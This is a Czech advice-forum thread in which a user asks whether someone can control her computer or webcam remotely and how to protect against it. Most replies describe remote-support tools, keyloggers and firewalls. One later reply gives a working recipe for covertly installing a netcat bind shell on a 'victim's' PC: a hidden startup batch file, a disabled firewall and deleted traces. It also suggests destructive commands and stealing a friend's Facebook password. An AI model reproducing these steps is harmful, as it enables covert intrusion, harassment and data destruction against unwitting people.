Lze ovládat na dálku cizí počítač?

Od: Datum: 19.11.12 20:23 odpovědí: 12 změna: 25.07.14 14:32

Slyšela jsem, že se někdo umí dostat do cizího počítače jakoby na dálku, že se může koukat na co koukám na internetu, nebo je dokonce schopen si na dálku zapnout mou webkameru, je to pravda? můžu si před tím nějak počítač chránit?

Seznam odpovědí:

moment čekejte prosím, probíhá přenos dat...
Zobrazení struktury odpovědí v otázce
Skrytí struktury odpovědí v otázce
Zobrazení struktury odpovědí v otázce

Odpovědi na otázku:
Datum: 19.11.12 20:36

do pocitace se da nainstalovat prograk ktery bude zaznamenavat vse co pises a muze i fotit v nastavenem intervalu tvou obrazovku a potom to posilat na mail :) toto se da pouzit kdyz chce napriklad sef kontrolovat sve pracovniky a ti o tom nemusi ani vedet;)

dale jsou programy pomoci kterych lze ovladat druhy pocitac napriklad Teanviewer ale u tohoto musis svhalit a poslat par udaju druhe strane.

Nevim zrovna o zadnem programu ktery se da pouzit pro ovladani aby o tom nevedela druha strana ale nejspis existuji a antiviry by je mohli zachytit :) jiank zapniti webkamery by ti mela hlasit kontrolka kterou na webkamere mas :))

Ohodnoceno: 3x

Od: mowla*
Datum: 19.11.12 20:39

Lze to:

1. říká se tomu vzdálený přístup či řízení (tehdy, když to dovolíš úmyslně, např. když potřebuješ s něčím pomoct)

2. a nebo se tomu říká ´hacknutí´ počítače (to vlastně taky dovolíš úmyslně - nebo z lenosti), je usnadněno snadno prolomitelnými hesly, nedostatečnou antivirovou ochranou, neinstalováním bezpečnostních záplat na známé ´díry´ systému apod...

Ohodnoceno: 0x

Datum: 19.11.12 20:40

ano, jde to, můj správce to tak dělá. Když mám problém, zavolám mu, na nic nešahám a on pracuje za mne...

Od: abc*
Datum: 19.11.12 20:40

Dobrý den,

v případě,že uživateli,který je na druhé straně nedáte speciální kód a on není hacker,nemůže vás sledovat.

Od: abc*
Datum: 19.11.12 20:44

Kód získáte tak,že kliknete na ''Start'' a napíšete zde ''Vzdálená pomoc systému Windows''.

Datum: 19.11.12 20:56
Bránit se tomu dá lehce softwarem zvaným firewall. Ten by vám měl vyhodit hlášku kdykoli se nějaký program z vašeho počítače snaží odeslat cokoli na internet a nechat sí to od vás schválit. Pakliže nebudete takové hlášky bezhlavě povolovat neměl by mít nikdo šanci s vaším počítačem manipulovat. Jednoduchá verze firewallu je nativní součástí windows ale existují daleko lepší a dokonce i FREE čili bezplatné při používání v nekomerční sféře

Datum: 19.11.12 20:50

ovládat jde přes programy jako VNC nebo TeamViewer, ale to není pro "cizí" ale právě počítače, od kterých znáte přístupové heslo (používám tento program na všech počítačích v rodině, takže když má někdo problém, nemusím k němu jezdit), ale v tomto případě druhá strana o ovládání ví.

Pak jsou tu keyloggery, které můžou běžet skrytě, můžou fotit obrazovku, odesílat vše co se vyťukalo do klávesnice, název aktivního okna, všechno může chodit třeba na mail či FTP server a nemusíte o tom ani vidět. Ale hlavně Vám ten program někdo napřed do toho počítače musí nainstalovat.

Třetí možnost je, když je někdo zkušený hacker, ale myslíte, že někoho tak moc zajímá, co zrovna děláte na internetu? ;)

Datum: 20.11.12 07:52

Několik věcí mi takhle vysvětloval bratr z Čech na SKYPE. *palec*Ale to byla přátelská a chtěná pomoc.

Od: prochy
Datum: 25.07.14 13:35

ano lze a naprosto snadno když máte s hackerstvím alespoň malé zkušenosti, sice netuším jestli to bylo myšleno ze strachu jestli někdo cizí nesleduje váš pc ale vysvětlím to tak aby jste to uměli...

takže si napřed musíme v nastavení povolit zobrazování známých přípon souborů, pak stáhnout program netcat.exe v pohodě ho najdete na uložtu, po té si vytvoříte textový dokument a.k.a poznámkový blok,pojmenujte si ho nějak důležitě aby ho oběť nezavírala, pak si ho otevřeme a do něj vložime toto :

@echo off

:REPLY

netcat -vv -l -p 10001 -e cmd.exe
GOTO REPLY
pause

pak to uložíme a až bude uložený tak přepíšeme příponu .txt na .cmd ,a uděláme ještě jednou to samý ale teď si dovnitř napíšeme:

@echo off
ipconfig /all
pause

teď je ale ta horší část: musíte se dostat k pc oběti, tam do něj vložit netcat sploečně s naším 1. cmd souborem, nejlépe dát do složky start menu neboli po spuštění (záleží na verzi windows) a pak spusťte náš cmd soubor a klikněte na něm v levo nahoře do ikonky vyběhne vám nabídka v té klikněte na "vlastnosti" v těch si najeďte na "rozložení" a v tom dejte šířka 0 výška 0 aby byl neviditelný na ploše, pak ho zavřete. nyní jsme stále na počítači oběti, vypněte bránu firewall, s tím si doufám poradíte sami, prostě najeďte do nastavení brány firewall a tam si najďete vypnout bránu firewall a nakonec si v pc oběti otevřeme cmd soubor který jsme si udělali jako druhý, ale pozor ten vložíme pouze na plochu a před odchodem z pc oběti ho smažeme aby jsme zahladily stopy a až tedy ten soubor spustíme najdeme si podle tohoto videa

ip adresu tu si opíšeme na nějaký kus papíru. teď už můžeme soubor zavřít a smazat a vypadnou z toho pc než na vás zavolaj policajty! upozorňuji že tento způsob získání ip adresy nefunguje na windowsech 8, pokud ho oběť má tak si to budete muset obstarat jiným způsobem.

tak a teď na svém pc vytvořte opět poznámkový blok do něj tentokrát vlože toto :

netcat -v -n ADRESA_OBETI 10001

samozřejmě tam nenapíšeme adresa oběti ale vypíšeme tam naší opsanou adresu oběti kterou jsme si zjistili. A opět uložíme tentokrát jako backdoor.cmd a tím je práce dokončena HAHAHAHA

nyní když je oběť připojená k internetu a má na pc spuštěný náš soubor (pc oběti musí být samozřejmě spuštěný a vy musíte být taky připojený k internetu) tak my jen spustíme backdoor.cmd a ovládáme příkazovým řádkem do něj pouzedáváme přík. jako například : shutdown s- t- 10 (pc se za 10 sekund vypne) delete c: (zničení pc vymazáním systémových souborů) a pokud takovéto příkazy neznáte tak si prostě vygooglujte cmd příkazy (ps:nemůžete vidět pracovní plochu ale můžete si kopírovat soubory a podobně) a nakonec bych byl rád kdyby toto nebylo využito k trestné činosti ale pouze jako například k nachytání vašeho kamráda nebo zjištění jeho hesla na fb a tam psát příspěvky typu : jsem gay a pod... zkrátka né k zločinným praktikám.

Datum: 25.07.14 14:21

Tak to je tedy eleganti zpusob jak nekomu ovladat pocitac. To uz ho rovnou muzete pozadat o vzdalenou plochu. Navic pokuste se pres cmd vymazat systemovy soubor. System Vas nepusti poskodit sam sebe. Takze jedine kdyz mate fyzicky pristup k PC a navic nejde o legalni cinnost. Takovy prispevek sem na poradnu dle meho nazoru nepatri.

Od: pr0chy
Datum: 25.07.14 14:32

máte pravdu ale příkaz o kterém jsem mluvil byl jenom 1. co mě napadl tak jsem ho prostě napsal nechtěl jsem tim nějak navádět k použití onoho příkazu .

a ještě vím že je to nelegální ale já podobné praktiky nepoužívám jenom například testuji na pc kamaráda a samozřejmě s jeho oprávněním a chci před ním například pouze zamachrovat né mu něco provést a také jsem na konci napsal jasně že nechci aby to bylo využito k trestné činnosti.

Od: pr0chy
Datum: 25.07.14 14:03

omlouvám se za špatný odkaz v mé předchozí odpovědi ale takto to jde také zjistit :)

a aby jste věděli toto video není ode mě, ani video které jsem tam chtěl dát původně :D

Přihlásit se k odběru odpovědí z této otázky:

Neneseme odpovědnost za správnost informací a za škodu vzniklou jejich využitím. Jednotlivé odpovědi vyjadřují názory jejich autorů a nemusí se shodovat s názorem provozovatele poradny Poradte.cz

Copyright © 2004-2016 Poradna Poradte.cz. Všechna práva na poradně Poradte.cz vyhrazena.